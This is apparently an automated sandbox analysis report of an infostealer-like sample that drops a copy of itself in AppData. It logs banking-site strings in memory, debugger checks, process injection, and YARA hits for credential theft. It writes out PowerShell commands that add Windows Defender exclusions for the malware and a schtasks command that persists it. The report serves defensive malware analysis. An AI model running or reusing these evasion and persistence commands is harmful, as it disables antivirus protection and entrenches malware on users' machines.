                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B69590 LdrInitializeThunk,9_2_06B69590
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory written: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory written: C:\Users\user\AppData\Roaming\AcEnrS.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Users\user\AppData\Roaming\AcEnrS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Users\user\AppData\Roaming\AcEnrS.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
